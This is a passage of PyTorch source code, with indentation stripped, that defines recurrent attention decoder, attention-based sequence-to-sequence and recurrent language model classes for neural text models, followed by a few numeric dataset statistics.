num_layers=num_layers, bias=bias,
batch_first=batch_first,
dropout=dropout, rnn_cell=rnn_cell)
self.attn = attention(hidden_size, context_size,
batch_first=batch_first)
self.dropout = nn.Dropout(dropout)
self.hidden_size = hidden_size
def forward(self, inputs, hidden, context, get_attention=False):
outputs = []
attentions = []
for input_t in inputs.split(1):
input_t = input_t.squeeze(0)
output_t, hidden = self.rnn(input_t, hidden)
output_t, attn = self.attn(output_t, context)
output_t = self.dropout(output_t)
outputs += [output_t]
if get_attention:
attentions += [attn]
outputs = torch.stack(outputs)
if get_attention:
attentions = torch.stack(attentions)
return outputs, hidden, attentions
else:
return outputs, hidden
class RecurrentAttentionDecoder(nn.Module):
def __init__(self, vocab_size, hidden_size=128,
num_layers=1, bias=True, batch_first=False,
dropout=0, tie_embedding=False, context_size=None,
rnn_cell=nn.LSTMCell, attention=GlobalAttention):
super(RecurrentAttentionDecoder, self).__init__()
self.layers = num_layers
self.embedder = nn.Embedding(vocab_size,
hidden_size,
padding_idx=0)
self.rnn = RecurrentAttention(hidden_size, hidden_size, context_size=context_size,
num_layers=num_layers, bias=bias, batch_first=batch_first,
dropout=dropout, rnn_cell=rnn_cell, attention=attention)
self.dropout = nn.Dropout(dropout)
self.classifier = nn.Linear(hidden_size, vocab_size)
if tie_embedding:
self.classifier.weight = self.embedder.weight
self.hidden_size = hidden_size
def forward(self, inputs, context, get_attention=False):
context, hidden = context
emb = self.embedder(inputs)
if get_attention:
x, hidden, attentions = self.rnn(
emb, hidden, context, get_attention=get_attention)
else:
x, hidden = self.rnn(emb, hidden, context)
x = x.view(-1, x.size(2))
x = self.classifier(x)
x = x.view(inputs.size(0), inputs.size(1), -1)
if get_attention:
return x, (context, hidden), attentions
else:
return x, (context, hidden)
class RecurrentAttentionSeq2Seq(Seq2Seq):
def __init__(self, vocab_size, hidden_size=256,
num_layers=2, bias=True, dropout=0, tie_embedding=False):
super(RecurrentAttentionSeq2Seq, self).__init__()
self.encoder = RecurrentEncoder(vocab_size, hidden_size=hidden_size,
num_layers=num_layers, bias=bias, dropout=dropout)
self.decoder = RecurrentAttentionDecoder(vocab_size, hidden_size=hidden_size,
tie_embedding=tie_embedding,
num_layers=num_layers, bias=bias, dropout=dropout)
if tie_embedding:
self.encoder.embedder.weight = self.decoder.embedder.weight
def generate(self, inputs, context, get_attention=False):
return self.decoder(inputs, context, get_attention=get_attention)
def bridge(self, context):
context, hidden = context
new_hidden = []
for h in hidden:
if self.encoder.bidirectional:
new_h = bridge_bidirectional_hidden(h)
else:
new_h = h
new_hidden.append(new_h)
return (context, tuple(new_hidden))
class RecurrentLanguageModel(Seq2Seq):
def __init__(self, vocab_size, hidden_size=256,
num_layers=2, bias=True, dropout=0, tie_embedding=False):
super(RecurrentLanguageModel, self).__init__()
self.decoder = RecurrentDecoder(vocab_size, hidden_size=hidden_size,
tie_embedding=tie_embedding,
num_layers=num_layers, bias=bias, dropout=dropout)
def encode(self, *kargs, **kwargs):
return None
| 40.799213
| 99
| 0.596545
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.